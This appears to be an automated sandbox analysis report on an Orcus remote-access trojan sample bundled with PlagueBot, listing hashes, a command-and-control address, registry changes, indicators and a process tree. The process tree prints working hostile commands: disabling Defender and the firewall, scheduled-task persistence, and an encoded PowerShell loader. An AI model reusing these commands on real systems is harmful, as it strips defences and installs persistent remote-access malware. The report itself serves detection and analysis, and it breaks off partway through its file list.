orcus | 57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
19-10-2022 07:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b7756f9d9e8c5f4ba2c930adb666fbae.exe
Size

100KB
MD5

b7756f9d9e8c5f4ba2c930adb666fbae
SHA1

8ddb9f2a559f6af5ccaa04c8b5b589d216357340
SHA256

57e85409564bed14d33d2ae2663b2bc64f99588c83b208f9091eceaf87097c1b
SHA512

c5c85c86251c34530b672de0feee38bd148cddd53beb7191a250f09e6d504460c343a0f608e2002434e4b98585e61222f44bc159bfb2a340c0e73a3941bef67f
SSDEEP

1536:DQIAibOVOk3udovOyePC9Eop2h90L64QG9iDCzPgQD8Kg90a//MudDBG:DQ/ibOcIudovOy8CUwIOkCzgQq0UzxM

Score

10^/10

orcus plaguebot botnet evasion persistence rat spyware stealer trojan

Malware Config

Extracted

Family

orcus

146.70.143.176:81

Mutex

712d31c7a3f54904a08d968a15b836e9

Attributes

autostart_method
Registry
enable_keylogger
false
install_path
%programfiles%\orc\orc.exe
reconnect_delay
10000
registry_keyname
orc
taskscheduler_taskname
orc
watchdog_path
AppData\Watchdog.exe

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	b7756f9d9e8c5f4ba2c930adb666fbae.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	b7756f9d9e8c5f4ba2c930adb666fbae.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	b7756f9d9e8c5f4ba2c930adb666fbae.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	b7756f9d9e8c5f4ba2c930adb666fbae.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	b7756f9d9e8c5f4ba2c930adb666fbae.exe

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	b7756f9d9e8c5f4ba2c930adb666fbae.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet002\Services\WinDefend\Start = "4"	b7756f9d9e8c5f4ba2c930adb666fbae.exe

Orcus
Orcus is a Remote Access Trojan that is being sold on underground forums.
rat spyware stealer orcus

Orcus main payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0001000000022e4a-177.dat	family_orcus
behavioral2/files/0x0001000000022e4a-176.dat	family_orcus

PlagueBot
PlagueBot is an open source Bot written in Pascal.
botnet plaguebot

Orcurs Rat Executable 3 IoCs

resource	yara_rule
behavioral2/files/0x0001000000022e4a-177.dat	orcus
behavioral2/files/0x0001000000022e4a-176.dat	orcus
behavioral2/memory/3436-257-0x0000000000670000-0x000000000075A000-memory.dmp	orcus

PlagueBot Executable 4 IoCs

resource	yara_rule
behavioral2/files/0x0001000000022e4c-194.dat	plaguebot
behavioral2/files/0x0001000000022e4c-193.dat	plaguebot
behavioral2/files/0x0001000000022e59-235.dat	plaguebot
behavioral2/files/0x0001000000022e59-234.dat	plaguebot

Blocklisted process makes network request 6 IoCs

flow	pid	Process
27	2992	powershell.exe
43	2992	powershell.exe
47	2992	powershell.exe
50	2992	powershell.exe
53	2992	powershell.exe
56	2992	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 15 IoCs

pid	Process
3312	FILE.exe
4436	blmkgrp.exe
4960	blmkgrp.exe
1264	orc.exe
3464	plage.exe
2424	winmgr.exe
480	WindowsInput.exe
5084	WindowsInput.exe
3436	orc.exe
4940	orc.exe
2140	Watchdog.exe
3716	Watchdog.exe
3760	DefaultDomain
3988	winmgr.exe
3464	winmgr.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	FILE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	plage.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	orc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	orc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Watchdog.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	b7756f9d9e8c5f4ba2c930adb666fbae.exe

Loads dropped DLL 19 IoCs

pid	Process
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe
4960	blmkgrp.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "4"	b7756f9d9e8c5f4ba2c930adb666fbae.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	b7756f9d9e8c5f4ba2c930adb666fbae.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\orc = "\"C:\\Program Files\\orc\\orc.exe\""	orc.exe

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File created	C:\Windows\assembly\Desktop.ini	orc.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	orc.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\WindowsInput.InstallState	WindowsInput.exe
File created	C:\Windows\SysWOW64\WindowsInput.exe	orc.exe
File created	C:\Windows\SysWOW64\WindowsInput.exe.config	orc.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\orc\orc.exe	orc.exe
File opened for modification	C:\Program Files\orc\orc.exe	orc.exe
File created	C:\Program Files\orc\orc.exe.config	orc.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\assembly\Desktop.ini	orc.exe
File opened for modification	C:\Windows\assembly	orc.exe
File created	C:\Windows\assembly\Desktop.ini	orc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4544	schtasks.exe
4524	schtasks.exe
4152	schtasks.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	b7756f9d9e8c5f4ba2c930adb666fbae.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1748	powershell.exe
1748	powershell.exe
5104	powershell.exe
5104	powershell.exe
3440	powershell.exe
3440	powershell.exe
2992	powershell.exe
2992	powershell.exe
2992	powershell.exe
3440	powershell.exe
2904	powershell.exe
2904	powershell.exe
2904	powershell.exe
3436	orc.exe
3436	orc.exe
3436	orc.exe
3716	Watchdog.exe
3716	Watchdog.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3716	Watchdog.exe
3436	orc.exe
3436	orc.exe
3716	Watchdog.exe
3716	Watchdog.exe
3436	orc.exe
3436	orc.exe
3716	Watchdog.exe
3436	orc.exe
3716	Watchdog.exe
3716	Watchdog.exe
3436	orc.exe
3436	orc.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	4888	b7756f9d9e8c5f4ba2c930adb666fbae.exe
Token: SeRestorePrivilege	4888	b7756f9d9e8c5f4ba2c930adb666fbae.exe
Token: SeSecurityPrivilege	4888	b7756f9d9e8c5f4ba2c930adb666fbae.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	5104	powershell.exe
Token: SeDebugPrivilege	4888	b7756f9d9e8c5f4ba2c930adb666fbae.exe
Token: SeDebugPrivilege	3440	powershell.exe
Token: SeDebugPrivilege	2992	powershell.exe
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	2140	Watchdog.exe
Token: SeDebugPrivilege	3436	orc.exe
Token: SeDebugPrivilege	3716	Watchdog.exe
Token: SeDebugPrivilege	3760	DefaultDomain

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2992	powershell.exe

Suspicious use of WriteProcessMemory 59 IoCs

description	pid	Process	procid_target
PID 4888 wrote to memory of 1748	4888	b7756f9d9e8c5f4ba2c930adb666fbae.exe	83
PID 4888 wrote to memory of 1748	4888	b7756f9d9e8c5f4ba2c930adb666fbae.exe	83
PID 4888 wrote to memory of 4152	4888	b7756f9d9e8c5f4ba2c930adb666fbae.exe	85
PID 4888 wrote to memory of 4152	4888	b7756f9d9e8c5f4ba2c930adb666fbae.exe	85
PID 4888 wrote to memory of 5104	4888	b7756f9d9e8c5f4ba2c930adb666fbae.exe	86
PID 4888 wrote to memory of 5104	4888	b7756f9d9e8c5f4ba2c930adb666fbae.exe	86
PID 4888 wrote to memory of 3312	4888	b7756f9d9e8c5f4ba2c930adb666fbae.exe	92
PID 4888 wrote to memory of 3312	4888	b7756f9d9e8c5f4ba2c930adb666fbae.exe	92
PID 4888 wrote to memory of 3312	4888	b7756f9d9e8c5f4ba2c930adb666fbae.exe	92
PID 4888 wrote to memory of 3224	4888	b7756f9d9e8c5f4ba2c930adb666fbae.exe	93
PID 4888 wrote to memory of 3224	4888	b7756f9d9e8c5f4ba2c930adb666fbae.exe	93
PID 3312 wrote to memory of 4436	3312	FILE.exe	97
PID 3312 wrote to memory of 4436	3312	FILE.exe	97
PID 4436 wrote to memory of 4960	4436	blmkgrp.exe	98
PID 4436 wrote to memory of 4960	4436	blmkgrp.exe	98
PID 3312 wrote to memory of 1264	3312	FILE.exe	99
PID 3312 wrote to memory of 1264	3312	FILE.exe	99
PID 3312 wrote to memory of 3464	3312	FILE.exe	104
PID 3312 wrote to memory of 3464	3312	FILE.exe	104
PID 3312 wrote to memory of 3464	3312	FILE.exe	104
PID 3464 wrote to memory of 4544	3464	plage.exe	103
PID 3464 wrote to memory of 4544	3464	plage.exe	103
PID 3464 wrote to memory of 4544	3464	plage.exe	103
PID 4960 wrote to memory of 5024	4960	blmkgrp.exe	102
PID 4960 wrote to memory of 5024	4960	blmkgrp.exe	102
PID 3224 wrote to memory of 3440	3224	WScript.exe	105
PID 3224 wrote to memory of 3440	3224	WScript.exe	105
PID 3224 wrote to memory of 2992	3224	WScript.exe	107
PID 3224 wrote to memory of 2992	3224	WScript.exe	107
PID 5024 wrote to memory of 4256	5024	cmd.exe	109
PID 5024 wrote to memory of 4256	5024	cmd.exe	109
PID 3464 wrote to memory of 3692	3464	plage.exe	110
PID 3464 wrote to memory of 3692	3464	plage.exe	110
PID 3464 wrote to memory of 3692	3464	plage.exe	110
PID 4256 wrote to memory of 5060	4256	net.exe	112
PID 4256 wrote to memory of 5060	4256	net.exe	112
PID 1264 wrote to memory of 684	1264	orc.exe	113
PID 1264 wrote to memory of 684	1264	orc.exe	113
PID 4960 wrote to memory of 4556	4960	blmkgrp.exe	115
PID 4960 wrote to memory of 4556	4960	blmkgrp.exe	115
PID 684 wrote to memory of 3636	684	csc.exe	117
PID 684 wrote to memory of 3636	684	csc.exe	117
PID 4556 wrote to memory of 2904	4556	cmd.exe	118
PID 4556 wrote to memory of 2904	4556	cmd.exe	118
PID 3464 wrote to memory of 2424	3464	plage.exe	119
PID 3464 wrote to memory of 2424	3464	plage.exe	119
PID 3464 wrote to memory of 2424	3464	plage.exe	119
PID 2992 wrote to memory of 4524	2992	powershell.exe	120
PID 2992 wrote to memory of 4524	2992	powershell.exe	120
PID 1264 wrote to memory of 480	1264	orc.exe	121
PID 1264 wrote to memory of 480	1264	orc.exe	121
PID 1264 wrote to memory of 3436	1264	orc.exe	124
PID 1264 wrote to memory of 3436	1264	orc.exe	124
PID 3436 wrote to memory of 2140	3436	orc.exe	126
PID 3436 wrote to memory of 2140	3436	orc.exe	126
PID 3436 wrote to memory of 2140	3436	orc.exe	126
PID 2140 wrote to memory of 3716	2140	Watchdog.exe	127
PID 2140 wrote to memory of 3716	2140	Watchdog.exe	127
PID 2140 wrote to memory of 3716	2140	Watchdog.exe	127

C:\Users\Admin\AppData\Local\Temp\b7756f9d9e8c5f4ba2c930adb666fbae.exe
"C:\Users\Admin\AppData\Local\Temp\b7756f9d9e8c5f4ba2c930adb666fbae.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Checks computer location settings
- Windows security modification
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1748
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\b7756f9d9e8c5f4ba2c930adb666fbae.exe" /rl HIGHEST /f
  2⤵
  - Creates scheduled task(s)
  PID:4152
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5104
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\FILE.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\FILE.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3312
- - C:\Users\Admin\AppData\Local\Temp\blmkgrp.exe
    "C:\Users\Admin\AppData\Local\Temp\blmkgrp.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4436
  - - C:\Users\Admin\AppData\Local\Temp\blmkgrp.exe
      "C:\Users\Admin\AppData\Local\Temp\blmkgrp.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:4960
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "net session"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5024
      - C:\Windows\system32\net.exe
        
        net session
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4256
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        7⤵
        
        PID:5060
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableRealtimeMonitoring $true && netsh Advfirewall set allprofiles state off"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4556
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableRealtimeMonitoring $true
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2904
- - C:\Users\Admin\AppData\Local\Temp\orc.exe
    "C:\Users\Admin\AppData\Local\Temp\orc.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Drops desktop.ini file(s)
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:1264
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cms3rsmg.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:684
    - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFE4B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFE4A.tmp"
        5⤵
        
        PID:3636
  - - C:\Windows\SysWOW64\WindowsInput.exe
      "C:\Windows\SysWOW64\WindowsInput.exe" --install
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      PID:480
  - - C:\Program Files\orc\orc.exe
      "C:\Program Files\orc\orc.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3436
    - - C:\Users\Admin\AppData\Roaming\Watchdog.exe
        
        "C:\Users\Admin\AppData\Roaming\Watchdog.exe" /launchSelfAndExit "C:\Program Files\orc\orc.exe" 3436 /protectFile
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2140
      - C:\Users\Admin\AppData\Roaming\Watchdog.exe
        
        "C:\Users\Admin\AppData\Roaming\Watchdog.exe" /watchProcess "C:\Program Files\orc\orc.exe" 3436 "/protectFile"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3716
- - C:\Users\Admin\Downloads\plage.exe
    "C:\Users\Admin\Downloads\plage.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3464
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Query /FO "LIST" /TN "WinManager"
      4⤵
      PID:3692
  - - C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
      "C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe" /wait
      4⤵
      Executes dropped EXE
      PID:2424
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmpCE70.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -window 1 Copy-Item 'C:\Users\Admin\AppData\Local\Temp\tmpCE70.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nitro64.vbs';
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABuAGkAdAByAG8ANgA0AFwAKQAuAG4AaQB0AHIAbwA2ADQAKQA7ACAAJAB0AGUAeAB0ACAAPQAgAC0AagBvAGkAbgAgACQAdABlAHgAdABbAC0AMQAuAC4ALQAkAHQAZQB4AHQALgBMAGUAbgBnAHQAaABdADsAIABbAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAZQB4AHQAKQApAC4ARQBuAHQAcgB5AFAAbwBpAG4AdAAuAEkAbgB2AG8AawBlACgAJABOAHUAbABsACwAJABOAHUAbABsACkAOwA=
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2992
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /sc minute /mo 1 /tn "nitro64" /tr "C:\Users\Admin\AppData\Local\DefaultDomain"
      4⤵
      Creates scheduled task(s)
      PID:4524

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /TN "WinManager" /XML "C:\Users\Admin\AppData\Local\Temp\NewTask.xml"
1⤵
- Creates scheduled task(s)
PID:4544

C:\Windows\SysWOW64\WindowsInput.exe
"C:\Windows\SysWOW64\WindowsInput.exe"
1⤵
- Executes dropped EXE
PID:5084

C:\Program Files\orc\orc.exe
"C:\Program Files\orc\orc.exe"
1⤵
- Executes dropped EXE
PID:4940

C:\Users\Admin\AppData\Local\DefaultDomain
C:\Users\Admin\AppData\Local\DefaultDomain
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3760

C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
1⤵
- Executes dropped EXE
PID:3988

C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
1⤵
- Executes dropped EXE
PID:3464

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b1a1d8b05525b7b0c5babfd80488c1f2

SHA1
c85bbd6b7d0143676916c20fd52720499c2bb5c6

SHA256
adad192fc86c2f939fd3f70cb9ad323139a4e100f7c90b4454e2c53bdbc9b705

SHA512
346c6513c1373bab58439e37d3f75de1c5c587d7eb27076cf696e885a027b3b38d70b585839d1a2e7f2270cdcf0dac8c1fdff799f3b1158242ae9e3364c2a06e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
110b59ca4d00786d0bde151d21865049

SHA1
557e730d93fdf944a0cad874022df1895fb5b2e2

SHA256
77f69011c214ea5a01fd2035d781914c4893aee66d784deadc22179eadfdf77f

SHA512
cb55ac6eca50f4427718bace861679c88b2fdfea94d30209e8d61ca73a6ce9f8c4b5334922d2660a829b0636d20cbdf3bae1497c920e604efe6c636019feb10e

Download Submit
C:\Users\Admin\AppData\Local\Temp\NewTask.xml

Filesize
1KB

MD5
2a371811cedb28336bbf01036b935ef1

SHA1
40b1f999cb62a8beaffc71971f71a85ae1b95e74

SHA256
cb78d48061f212d80c9082c71a1a714e33bf4047f9ef411c0dd78ea2f09cb2a9

SHA512
205d1b764bca8c6d733e759beece3a6862152d9bbaf2207ebfee3172bef5ada4b60beef5f2a5da5f3fba6955c954f1881da3414d4e9028018432f0ca615fbde5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESFE4B.tmp

Filesize
1KB

MD5
5e7f50696140bd59774225ce7b50c272

SHA1
6a88b0be20f61091a0ad8f5aedd4fde1b1de1dd8

SHA256
24ed8aa0a5a820a5dff5aa94cb252a7d6a58eb1019edcf171a867d540d0ffee8

SHA512
55a3874b0299206aee8cc5bbc41350c8592a147442c5a7007ea72269f9558f9d6d4fc12ea0ea2c6707784478450cc2f33db5c493c896d06f0ca9740e4df9e077

Download Submit
C:\Users\Admin\AppData\Local\Temp\blmkgrp.exe

Filesize
7.6MB

MD5
cb565c1afd8469f43dd6917af55b733f

SHA1
e71a56a7b13536d686ab9f4f2492d60c02a7790e

SHA256
4a6b790629a17abb31de40da6a9faafdedbbc794f3e23816776621a83b068056

SHA512
d4ae535bdc800581c0fbcd186edd9d03067c08280376f06ec2e96e3118eb682663de260be6e756a85c4f6240fa9ba2c1ab265b54a56b57865b273af68d650645

Download Submit
C:\Users\Admin\AppData\Local\Temp\blmkgrp.exe

Filesize
7.6MB

MD5
cb565c1afd8469f43dd6917af55b733f

SHA1
e71a56a7b13536d686ab9f4f2492d60c02a7790e

SHA256
4a6b790629a17abb31de40da6a9faafdedbbc794f3e23816776621a83b068056

SHA512
d4ae535bdc800581c0fbcd186edd9d03067c08280376f06ec2e96e3118eb682663de260be6e756a85c4f6240fa9ba2c1ab265b54a56b57865b273af68d650645

Download Submit
C:\Users\Admin\AppData\Local\Temp\blmkgrp.exe

Filesize
7.6MB

MD5
cb565c1afd8469f43dd6917af55b733f

SHA1
e71a56a7b13536d686ab9f4f2492d60c02a7790e

SHA256
4a6b790629a17abb31de40da6a9faafdedbbc794f3e23816776621a83b068056

SHA512
d4ae535bdc800581c0fbcd186edd9d03067c08280376f06ec2e96e3118eb682663de260be6e756a85c4f6240fa9ba2c1ab265b54a56b57865b273af68d650645

Download Submit
C:\Users\Admin\AppData\Local\Temp\cms3rsmg.dll

Filesize
76KB

MD5
fd6709f5eeb71a2d6ad36fa4accd17ea

SHA1
ce5adce5884f03c388ac45a9ce53e2815f9eaac0

SHA256
5b30bc738645f5f2aea1d17a8b691f59c8ed2175d0ea51a59e76cf4835ba856e

SHA512
741146087527e2237a807e2f4cfc9a42c2d8d591fba79a21fbc23480601313ca0b8deaa8e00ef4fde925fce3fa7fb9bf7eb6134ae4bea1f76cdfff5e72aa459a

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\MSVCP140.dll

Filesize
553KB

MD5
6da7f4530edb350cf9d967d969ccecf8

SHA1
3e2681ea91f60a7a9ef2407399d13c1ca6aa71e9

SHA256
9fee6f36547d6f6ea7ca0338655555dba6bb0f798bc60334d29b94d1547da4da

SHA512
1f77f900215a4966f7f4e5d23b4aaad203136cb8561f4e36f03f13659fe1ff4b81caa75fef557c890e108f28f0484ad2baa825559114c0daa588cf1de6c1afab

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\MSVCP140.dll

Filesize
553KB

MD5
6da7f4530edb350cf9d967d969ccecf8

SHA1
3e2681ea91f60a7a9ef2407399d13c1ca6aa71e9

SHA256
9fee6f36547d6f6ea7ca0338655555dba6bb0f798bc60334d29b94d1547da4da

SHA512
1f77f900215a4966f7f4e5d23b4aaad203136cb8561f4e36f03f13659fe1ff4b81caa75fef557c890e108f28f0484ad2baa825559114c0daa588cf1de6c1afab

Download Submit
C:\Users\Admin\AppData\Local\Temp\github.com_Blank-c_44362\PIL\_imaging.cp310-win_amd64.pyd

Filesize
955KB

MD5
